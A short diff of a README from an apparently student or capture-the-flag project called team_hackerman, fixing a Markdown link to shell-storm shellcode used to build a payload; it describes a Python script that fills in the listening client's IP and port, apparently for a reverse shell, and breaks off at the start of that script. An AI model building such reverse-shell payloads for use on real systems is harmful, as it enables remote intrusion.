JiNova/team_hackerman/README.md

 ## Generate your payload!

-We used (http://shell-storm.org/shellcode/files/shellcode-907.php)[this code] to generate our payload.
+We used [this code](http://shell-storm.org/shellcode/files/shellcode-907.php) to generate our payload.
 This python script generates a payload with the ip and port of the client which we would be listening through.

 ```
 def sockaddr():